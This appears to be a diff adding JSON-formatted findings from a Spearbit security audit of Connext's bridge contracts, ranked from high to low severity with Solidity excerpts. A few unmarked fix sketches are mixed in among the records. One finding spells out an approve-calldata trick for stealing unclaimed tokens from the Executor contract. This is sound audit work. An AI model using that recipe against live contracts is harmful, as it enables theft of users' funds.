if (success) { emit AavePortalRepayment(_transferId, adopted, backUnbackedAmount, portalFee); } else { // Reset values s.portalDebt[_transferId] += backUnbackedAmount; s.portalFeeDebt[_transferId] += portalFee; // Decrease the allowance SafeERC20.safeDecreaseAllowance(IERC20(adopted), s.aavePool, totalRepayAmount); // Update the amount repaid to 0, so the amount is credited to the router amountIn = 0; emit AavePortalRepaymentDebt(_transferId, adopted, s.portalDebt[_transferId], s.portalFeeDebt[_transferId]); }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "_handleExecuteTransaction() doesn't handle native assets correctly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function _handleExecuteTransaction() sends any native tokens to the executor contract first, and then calls s.executor.execute(). This means that within that function msg.value will always be 0, so the associated logic that uses msg.value doesn't work as expected and the function doesn't handle native assets correctly. Note: also see issue \"Executor reverts on receiving native tokens from BridgeFacet\". contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(...)... { ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); (bool success, bytes memory returnData) = s.executor.execute(...); // no native tokens sent } } contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ... if (isNative && msg.value != _args.amount) { // msg.value is always 0 ... } } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Add checks to xcall()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function xcall() does some sanity checks; nevertheless, more checks should be added to prevent issues later on in the use of the protocol. If _args.recovery == 0 then _sendToRecovery() will send funds to the 0 address, effectively losing them. If _params.agent == 0 the forceReceiveLocal can't be used and funds might be locked forever. The _args.params.destinationDomain should never be s.domain, although this is also implicitly checked via _mustHaveRemote() assuming a correct configuration. If _args.params.slippageTol is set to something greater than s.LIQUIDITY_FEE_DENOMINATOR then funds can be locked, as xcall() allows the user to provide the local asset, avoiding any swap, while _handleExecuteLiquidity() in execute() may attempt to perform a swap on the destination chain. function xcall(XCallArgs calldata _args) external payable nonReentrant whenNotPaused returns (bytes32) { // Sanity checks. ... }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Executor and AssetLogic deal with native tokens inconsistently, which breaks execute()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When dealing with an external callee, the BridgeFacet will transfer liquidity to the Executor before calling Executor.execute. In order to send the native token: the Executor checks for _args.assetId == address(0), while AssetLogic.transferAssetFromContract() disallows address(0). Note: also see issue \"Executor reverts on receiving native tokens from BridgeFacet\".
contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction() ...{ ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); // _asset may not be 0 (bool success, bytes memory returnData) = s.executor.execute( IExecutor.ExecutorArgs( // assetId parameter from ExecutorArgs // must be 0 for Native asset ... _asset, ... ) ); ... } } library AssetLogic { function transferAssetFromContract( address _assetId, ... ) { ... // No native assets should ever be stored on this contract if (_assetId == address(0)) revert AssetLogic__transferAssetFromContract_notNative(); if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } } } contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ... bool isNative = _args.assetId == address(0); ... } } The BridgeFacet cannot handle external callees when using native tokens.", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Executor reverts on receiving native tokens from BridgeFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When doing an external call in execute(), the BridgeFacet provides liquidity to the Executor contract before calling Executor.execute. The BridgeFacet transfers the native token when address(wrapper) is provided. The Executor, however, does not have a fallback/receive function. Hence, the transaction will revert when the BridgeFacet tries to send the native token to the Executor contract. function _handleExecuteTransaction( ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); (bool success, bytes memory returnData) = s.executor.execute(...); ... } function transferAssetFromContract(...) ... { ... if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } else { ... } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "SponsorVault sponsors full transfer amount in reimburseLiquidityFees()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The BridgeFacet passes args.amount as _liquidityFee when calling reimburseLiquidityFees. Instead of sponsoring the liquidityFee, the sponsor vault would sponsor the full transfer amount to the receiver. Note: luckily the amount in reimburseLiquidityFees is capped by relayerFeeCap. function _handleExecuteTransaction(...) ... { ... (bool success, bytes memory data) = address(s.sponsorVault).call( abi.encodeWithSelector(s.sponsorVault.reimburseLiquidityFees.selector, _asset, _args.amount, _args.params.to) ); }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Tokens can get stuck in Executor contract if the destination doesn't claim them all", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function execute() increases allowance and then calls the recipient (_args.to). When the recipient does not use all tokens, these could remain stuck inside the Executor contract. Note: the executor can have excess tokens, see: kovan executor. Note: see issue \"Malicious call data can DOS execute or steal unclaimed tokens in the Executor contract\". function execute(...) ... { ... if (!isNative && hasValue) { SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); } ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, ... ); ... }",
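A minimal sketch of clearing the unspent allowance once the call returns (the placement inside execute() is this writeup's assumption, not a change present in the audited code):

(success, returnData) = ExcessivelySafeCall.excessivelySafeCall(
    _args.to, gas, isNative ? _args.amount : 0, MAX_COPY, _args.callData
);
// Revoke whatever the callee did not pull, so no claimable balance lingers.
if (!isNative && hasValue) {
    SafeERC20.safeApprove(IERC20(_args.assetId), _args.to, 0);
}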
+ "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "reimburseLiquidityFees sends tokens twice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function reimburseLiquidityFees() is called from the BridgeFacet, making the msg.sender within this function the BridgeFacet. When using tokenExchanges via swapExactIn(), tokens are sent to msg.sender, which is the BridgeFacet. Then, tokens are sent again to msg.sender via safeTransfer(), which is also the BridgeFacet. Therefore, tokens end up being sent to the BridgeFacet twice. Note: the check ...balanceOf(...) != starting + sponsored should fail too. Note: the fix in C4 seems to introduce this issue: code4rena-246 contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(... ) ... { ... uint256 starting = IERC20(_asset).balanceOf(address(this)); ... (bool success, bytes memory data) = address(s.sponsorVault).call( abi.encodeWithSelector(s.sponsorVault.reimburseLiquidityFees.selector, _asset, _args.amount, _args.params.to) ); if (success) { uint256 sponsored = abi.decode(data, (uint256)); // Validate correct amounts are transferred if (IERC20(_asset).balanceOf(address(this)) != starting + sponsored) { // this should fail now revert BridgeFacet__handleExecuteTransaction_invalidSponsoredAmount(); } ... } ... } } contract SponsorVault is ISponsorVault, ReentrancyGuard, Ownable { function reimburseLiquidityFees(... ) { if (address(tokenExchanges[_token]) != address(0)) { ... sponsoredFee = tokenExchange.swapExactIn{value: amountIn}(_token, msg.sender); // send to msg.sender } else { ... } ... IERC20(_token).safeTransfer(msg.sender, sponsoredFee); // send again to msg.sender } } interface ITokenExchange { /** * @notice Swaps the exact amount of native token being sent for a given token. * @param token The token to receive * @param recipient The recipient of the token * @return The amount of tokens resulting from the swap */ function swapExactIn(address token, address recipient) external payable returns (uint256); }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Anyone can repay the portalDebt with different tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Routers can provide liquidity in the protocol to improve the UX of cross-chain transfers. Liquidity is sent to users under the router's consent before the cross-chain message is settled on the optimistic message protocol, i.e., Nomad. The router can also borrow liquidity from AAVE if it does not have enough of it. It is the router's responsibility to repay the debt to AAVE. contract PortalFacet is BaseConnextFacet { function repayAavePortalFor( address _adopted, uint256 _backingAmount, uint256 _feeAmount, bytes32 _transferId ) external payable { address adopted = _adopted == address(0) ? address(s.wrapper) : _adopted; ...
// Transfer funds to the contract uint256 total = _backingAmount + _feeAmount; if (total == 0) revert PortalFacet__repayAavePortalFor_zeroAmount(); (, uint256 amount) = AssetLogic.handleIncomingAsset(_adopted, total, 0); ... // repay the loan _backLoan(adopted, _backingAmount, _feeAmount, _transferId); } } The PortalFacet does not check whether _adopted is the correct token in debt. Assume that the protocol borrows ETH for the current _transferId; the Router should therefore repay ETH to clear the debt. However, the Router can provide any valid token, e.g. DAI or USDC, to clear the debt. This results in the insolvency of the protocol. Note: a similar issue is also present in repayAavePortal().", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Malicious call data can steal unclaimed tokens in the Executor contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Users can provide a destination contract args.to and arbitrary data _args.callData when doing a cross-chain transfer. The protocol will provide the allowance to the callee contract and trigger the function call through ExcessivelySafeCall.excessivelySafeCall. contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ... SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); ... // Try to execute the callData // the low level call will return `false` if its execution reverts (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, gas, isNative ? _args.amount : 0, MAX_COPY, _args.callData ); ... } } Since there aren't restrictions on the destination contract and calldata, exploiters can steal the tokens from the executor. Note: the executor does have excess tokens, see: kovan executor. Note: see issue \"Tokens can get stuck in Executor contract\". Tokens can be stolen by granting an allowance. Setting calldata = abi.encodeWithSelector(ERC20.approve.selector, exploiter, type(uint256).max); and args.to = tokenAddress allows the exploiter to get an infinite allowance of any token, effectively stealing any unclaimed tokens left in the executor.", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Fee-On-Transfer tokens are not explicitly denied in swap()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The swap() function is used extensively within the Connext protocol, primarily when swapping between local and adopted assets. When a swap is performed, the function will check the actual amount transferred. However, this is not consistent with other swap functions, which check that the amount transferred is equal to dx. As a result, overwriting dx with tokenFrom.balanceOf(address(this)).sub(beforeBalance) allows fee-on-transfer tokens to work as intended.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "xcall() may erroneously overwrite prior calls to bumpTransfer()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The bumpTransfer() function allows users to increment the relayer fee on any given transferId without checking if the unique transfer identifier exists. As a result, a subsequent call to xcall() will overwrite the s.relayerFees mapping, leading to lost funds.",
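A minimal sketch of guarding bumpTransfer() against unknown ids (the s.transferExists mapping and the error name are hypothetical; the real fix needs a reliable record that the transferId was created by an xcall()):

function bumpTransfer(bytes32 _transferId) external payable {
    // hypothetical guard: only bump fees for transfers this domain has actually seen
    if (!s.transferExists[_transferId]) revert BridgeFacet__bumpTransfer_unknownTransfer();
    s.relayerFees[_transferId] += msg.value;
}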
", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "_handleExecuteLiquidity doesn't consistently check for receiveLocalOverrides", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function _handleExecuteLiquidity() initially checks for receiveLocal but does not check for receiveLocalOverrides. Later on it does check for both values. function _handleExecuteLiquidity(... ) ... { ... if ( !_args.params.receiveLocal && // doesn't check for receiveLocalOverrides s.routerBalances[_args.routers[0]][_args.local] < toSwap && s.aavePool != address(0) ) { ... if (_args.params.receiveLocal || s.receiveLocalOverrides[_transferId]) { // extra check return (toSwap, _args.local); } } As a result, the portal may pay the bridge user in the adopted asset when they opted to override this behaviour to avoid slippage conditions outside of their boundaries, potentially leading to an unwarranted reception of funds denominated in the adopted asset.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "Router signatures can be replayed when executing messages on the destination domain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Connext bridge supports near-instant transfers by allowing users to pay a small fee to routers for providing them with liquidity. Gelato relayers are tasked with taking in bids from liquidity providers, who sign a message consisting of the transferId and path length. The path length variable only guarantees that the message they signed will be valid if _args.routers.length - 1 other routers are also selected. However, it does not prevent Gelato relayers from re-using the same signature multiple times. As a result, routers may unintentionally provide more liquidity than expected.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "diamondCut() allows re-execution of old updates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function diamondCut() of LibDiamond verifies the signed version of the update parameters. It checks that the signed version is available and that a sufficient amount of time has passed. However, it doesn't prevent multiple executions, and the signed version stays valid forever. This allows old updates to be executed again. Assume the following: facet_x (or function_y) has value: version_1. Then: replace facet_x (or function_y) with version_2. Then a bug is found in version_2 and it is rolled back with: replace facet_x (or function_y) with version_1. Then a (malicious) owner could immediately do: replace facet_x (or function_y) with version_2 (because it is still valid). Note: the risk is limited because it can only be executed by the contract owner; however, this is probably not how the mechanism should work. library LibDiamond { function diamondCut(...) ... { ... uint256 time = ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))]; require(time != 0 && time < block.timestamp, \"LibDiamond: delay not elapsed\"); ...
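// Reviewer sketch (not part of the original code): consuming the acceptance time
// after a successful check would prevent the same signed update from being
// re-executed later, e.g.:
// delete ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))];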
} }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "Not always safeApprove(..., 0)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Some functions like _reconcileProcessPortal of BaseConnextFacet and _swapAssetOut of As- setLogic do safeApprove(..., 0) first. contract NomadFacet is BaseConnextFacet { function _reconcileProcessPortal( ... ) ... { ... // Edge case with some tokens: Example USDT in ETH Mainnet, after the backUnbacked call there ,! could be a remaining allowance if not the whole amount is pulled by aave. // Later, if we try to increase the allowance it will fail. USDT demands if allowance is not 0, ,! it has to be set to 0 first. // Example: ,! ,! [ParaSwapRepayAdapter.sol#L138-L140](https://github.com/aave/aave-v3-periphery/blob/ca184e5278bcbc1 0d28c3dbbc604041d7cfac50b/contracts/adapters/paraswap/ParaSwapRepayAdapter.sol#L138-L140) c SafeERC20.safeApprove(IERC20(adopted), s.aavePool, 0); SafeERC20.safeIncreaseAllowance(IERC20(adopted), s.aavePool, totalRepayAmount); ... } } While the following functions dont do this: xcall of BridgeFacet. _backLoan of PortalFacet. _swapAsset of AssetLogic. execute of Executor. This could result in problems with tokens like USDT. 24 contract BridgeFacet is BaseConnextFacet { ,! function xcall(XCallArgs calldata _args) external payable nonReentrant whenNotPaused returns (bytes32) { ... SafeERC20.safeIncreaseAllowance(IERC20(bridged), address(s.bridgeRouter), bridgedAmt); ... } } contract PortalFacet is BaseConnextFacet { function _backLoan(...) ... { ... SafeERC20Upgradeable.safeIncreaseAllowance(IERC20Upgradeable(_asset), s.aavePool, _backing + ,! _fee); ... } } library AssetLogic { function _swapAsset(...) ... { ... SafeERC20.safeIncreaseAllowance(IERC20(_assetIn), address(pool), _amount); ... } } contract Executor is IExecutor { function execute( ... ) ... { ... SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); ... } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "_slippageTol does not adjust for decimal differences", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Users set the slippage tolerance in percentage. The assetLogic calculates: minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR Then assetLogic uses minReceived in the swap functions. The minReceived, however, does not adjust for the decimal differences between assetIn and assetOut. Users will either always hit the slippage or suffer huge slippage when assetIn and assetOut have a different number of decimals. Assume the number of decimals of assetIn is 6 and the decimal of assetOut is 18. The minReceived will be set to 10-12 smaller than the correct value. Users would be vulnerable to sandwich attacks in this case. Assume the number of decimals of assetIn is 18 and the number of decimals of assetOut is 6. The minReceived will be set to 1012 larger than the correct value. Users would always hit the slippage and the cross-chain transfer will get stuck. 25 library AssetLogic { function _swapAsset(... ) ... { // Swap the asset to the proper local asset uint256 minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR; ... return (pool.swapExact(_amount, _assetIn, _assetOut, minReceived), _assetOut); ... 
} }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "Canonical assets should be keyed on the hash of domain and id", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "A canonical asset is a tuple of a (domain, id) pair. TokenRegistrys owner has the power to regis- ter new tokens in the system (See TokenRegistry.ensureLocalToken() and TokenRegistry.enrollCustom()). A canonical asset is registered using the hash of its domain and id (See TokenRegistry._setCanonicalToRepre- sentation()). Connext uses only the id of a canonical asset to uniquely identify. Here are a few references: swapStorages canonicalToAdopted It is an issue if TokenRegistry registers two canonical assets with the same id. canonical asset an unintended one might be transferred to the destination chain, of the transfers may revert. If this id fetches the incorrect", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "Missing checks for Chainlink oracle", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "ConnextPriceOracle.getTokenPrice() function goes through a series of oracles. At each step, it has a few validations to avoid incorrect price. If such validations succeed, the function returns the non-zero oracle price. For the Chainlink oracle, getTokenPrice() ultimately calls getPriceFromChainlink() which has the following validation if (answer == 0 || answeredInRound < roundId || updateAt == 0) { // answeredInRound > roundId ===> ChainLink Error: Stale price // updatedAt = 0 ===> ChainLink Error: Round not complete return 0; } updateAt refers to the timestamp of the round. This value isnt checked to make sure it is recent. 26 Additionally, it is important to be aware of the minAnswer and maxAnswer of the Chainlink oracle, these values are not allowed to be reached or surpassed. See Chainlink API reference for documentation on minAnswer and maxAnswer as well as this piece of code: OffchainAggregator.sol", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "Same params.SlippageTol is used in two different swaps", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The Connext protocol does a cross-chain transfer with the help of the Nomad protocol. to use the Nomad protocol, Connext has to convert the adopted token into the local token. For a cross-chain transfer, users take up two swaps. Adopted -> Local at the source chain and Local -> Adopted at the destination chain. BridgeFacet.sol#L299-L304 function xcall(XCallArgs calldata _args) external payable whenNotPaused nonReentrant returns (bytes32) { ... // Swap to the local asset from adopted if applicable. (uint256 bridgedAmt, address bridged) = AssetLogic.swapToLocalAssetIfNeeded( canonical, transactingAssetId, amount, _args.params.slippageTol ); ... } BridgeFacet.sol#L637 function _handleExecuteLiquidity( bytes32 _transferId, bytes32 _canonicalId, bool _isFast, ExecuteArgs calldata _args ) private returns (uint256, address) { ... // swap out of mad* asset into adopted asset if needed return AssetLogic.swapFromLocalAssetIfNeeded(_canonicalId, _args.local, toSwap, _args.params.slippageTol); ,! } The same slippage tolerance _args.params.slippageTol is used in two swaps. 
", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "getTokenPrice() returns stale token prices", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "getTokenPrice() reads from the assetPrices[tokenAddress].price mapping, which stores the latest price as configured by the protocol admin in setDirectPrice(). However, the check for a stale token price will never fall back to other price oracles as long as tokenPrice != 0. Therefore, the stale token price will be unintentionally returned.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Potential division by zero if gas token oracle is faulty", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "In the event that the gas token oracle is faulty and returns malformed values, the call to reimburseRelayerFees() in _handleExecuteTransaction() will fail. Fortunately, the low-level call() function will not prevent the transfer from being executed; however, this may lead to further issues down the line if changes are made to the sponsor vault.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Burn does not lower allowance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function _takeTokens() of BridgeRouter takes in the tokens from the sender. Sometimes it transfers them and sometimes it burns them. In the case of burning the tokens, the allowance isn't \"used up\". function _takeTokens(... ) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... IERC20(_token).safeTransferFrom(msg.sender, address(this), _amount); ... } else { ... _t.burn(msg.sender, _amount); ... } ... // doesn't use up the allowance } contract BridgeToken is Version0, IBridgeToken, OwnableUpgradeable, ERC20 { ... function burn(address _from, uint256 _amnt) external override onlyOwner { _burn(_from, _amnt); } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Two step ownership transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function setAdmin() transfers ownership to a new address. In case a wrong address is supplied, ownership becomes inaccessible. The same issue occurs with transferOwnership of OwnableUpgradeable in several Nomad contracts. Additionally, the Nomad contracts try to prevent renounceOwnership; however, renouncing can also be accomplished with transferOwnership to a non-existing address. Relevant Nomad contracts: TokenRegistry.sol NomadBase.sol UpdaterManager.sol XAppConnectionManager.sol contract ConnextPriceOracle is PriceOracle { ... function setAdmin(address newAdmin) external onlyAdmin { address oldAdmin = admin; admin = newAdmin; emit NewAdmin(oldAdmin, newAdmin); } } contract BridgeRouter is Version0, Router { ...
/** * @dev should be impossible to renounce ownership; * we override OpenZeppelin OwnableUpgradeable's implementation of * renounceOwnership to make it a no-op */ function renounceOwnership() public override onlyOwner { // do nothing } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Function removeRouter does not clear approvedForPortalRouters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function removeRouter() clears most of the fields of the struct RouterPermissionsManagerInfo except for approvedForPortalRouters. It is still good to also remove approvedForPortalRouters in removeRouter(), because if the router were to be added again later (via setupRouter()), or _isRouterOwnershipRenounced is set in the future, the router would still have the old approvedForPortalRouters. struct RouterPermissionsManagerInfo { mapping(address => bool) approvedRouters; // deleted mapping(address => bool) approvedForPortalRouters; // not deleted mapping(address => address) routerRecipients; // deleted mapping(address => address) routerOwners; // deleted mapping(address => address) proposedRouterOwners; // deleted mapping(address => uint256) proposedRouterTimestamp; // deleted } contract RoutersFacet is BaseConnextFacet { function removeRouter(address router) external onlyOwner { ... s.routerPermissionInfo.approvedRouters[router] = false; ... s.routerPermissionInfo.routerOwners[router] = address(0); ... s.routerPermissionInfo.routerRecipients[router] = address(0); ... delete s.routerPermissionInfo.proposedRouterOwners[router]; delete s.routerPermissionInfo.proposedRouterTimestamp[router]; } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Anyone can self burn lp token of the AMM", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When providing liquidity into the AMM pool, users get LP tokens. Users can redeem their share of the liquidity by returning LP tokens to the AMM pool. The current LPToken contract inherits OpenZeppelin's ERC20BurnableUpgradeable, so users can burn their tokens by calling burn without notifying the AMM pools. ERC20BurnableUpgradeable.sol#L26-L28. Although users do not profit from this action, it brings up concerns such as: An exploiter has an easy way to pump the LP price. Burning LP is similar to donating value to the pool. While it's good for the pool, this gives the exploiter another tool to break other protocols. After the Cream Finance attack, many protocols started to take extra caution and made this a restricted function (absorbing donations): github.com/yearn/yearn-security/blob/master/disclosures/2021-10-27.md. It also goes against best practice: every state of an AMM is related to price, and allowing external actors to change the AMM state without notifying the main contract is dangerous. It's also harder for a developer to build other novel AMMs on the same architecture. Note: the burn function is also not protected by nonReentrant or whenNotPaused.
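A minimal sketch of a possible restriction (assuming the pool owns the LPToken contract, as in the current setup): route all burns through the owner so supply cannot change behind the pool's back:

import "@openzeppelin/contracts-upgradeable/token/ERC20/extensions/ERC20BurnableUpgradeable.sol";
import "@openzeppelin/contracts-upgradeable/access/OwnableUpgradeable.sol";

contract LPTokenSketch is ERC20BurnableUpgradeable, OwnableUpgradeable {
    // only the AMM (the owner) may burn LP tokens
    function burn(uint256 amount) public override onlyOwner {
        super.burn(amount);
    }

    function burnFrom(address account, uint256 amount) public override onlyOwner {
        super.burnFrom(account, amount);
    }
}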
", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Skip timeout in diamondCut() (edge case)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Edge case: if someone manages to get an update through which deletes all facets, then the next update skips the delay (because ds.facetAddresses.length will be 0). library LibDiamond { function diamondCut(...) ... { ... if (ds.facetAddresses.length != 0) { uint256 time = ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))]; require(time != 0 && time < block.timestamp, \"LibDiamond: delay not elapsed\"); } // Otherwise, this is the first instance of deployment and it can be set automatically ... } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Limit gas for s.executor.execute()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The call to s.executor.execute() in BridgeFacet might use up all available gas. In that case, the callback to report to the originator might not be called, because execution stops due to an out-of-gas error. Note: the execute() function might be retried by the relayer, so perhaps this will fix itself eventually. Note: excessivelySafeCall in Executor does limit the amount of gas. contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(...) ... { ... (bool success, bytes memory returnData) = s.executor.execute(...); // might use all available gas ... // If callback address is not zero, send on the PromiseRouter if (_args.params.callback != address(0)) { s.promiseRouter.send(...); // might not have enough gas } ... } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Several external functions missing whenNotPaused modifier", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The following functions don't have a whenNotPaused modifier while most other external functions do. bumpTransfer of BridgeFacet. forceReceiveLocal of BridgeFacet. repayAavePortal of PortalFacet. repayAavePortalFor of PortalFacet. Without whenNotPaused these functions can still be executed when the protocol is paused.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Gas griefing attack on callback execution", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When the callback is executed on the source chain, the following line can revert or consume all forwarded gas. In this case, the relayer wastes gas and doesn't get the callback fee. ICallback(callbackAddress).callback(transferId, _msg.returnSuccess(), _msg.returnData());", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Callback fails when returnData is empty", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "If a transfer involves a callback, PromiseRouter reverts if returnData is empty.
if (_returnData.length == 0) revert PromiseRouter__send_returndataEmpty(); However, the callback should be allowed in case the user wants to report the calldata execution success on the destination chain (_returnSuccess).", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Redundant fee on transfer logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function repayAavePortalFor() has logic for fee-on-transfer tokens. However, handleIncomingAsset() doesn't allow fee-on-transfer tokens, so this extra code shouldn't be necessary in repayAavePortalFor(). function repayAavePortalFor(...) ... { ... (, uint256 amount) = AssetLogic.handleIncomingAsset(_adopted, total, 0); ... // If this was a fee on transfer token, reduce the total if (amount < total) { uint256 missing; unchecked { missing = total - amount; } if (missing < _feeAmount) { // Debit fee amount unchecked { _feeAmount -= missing; } } else { // Debit backing amount unchecked { missing -= _feeAmount; } _feeAmount = 0; _backingAmount -= missing; } } ... } library AssetLogic { function handleIncomingAsset(...) ... { ... // Transfer asset to contract trueAmount = transferAssetToContract(_assetId, _assetAmount); ... } function transferAssetToContract(address _assetId, uint256 _amount) internal returns (uint256) { ... // Validate correct amounts are transferred uint256 starting = IERC20(_assetId).balanceOf(address(this)); SafeERC20.safeTransferFrom(IERC20(_assetId), msg.sender, address(this), _amount); // Ensure this was not a fee-on-transfer token if (IERC20(_assetId).balanceOf(address(this)) - starting != _amount) { revert AssetLogic__transferAssetToContract_feeOnTransferNotSupported(); } ... } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Gas Optimization" 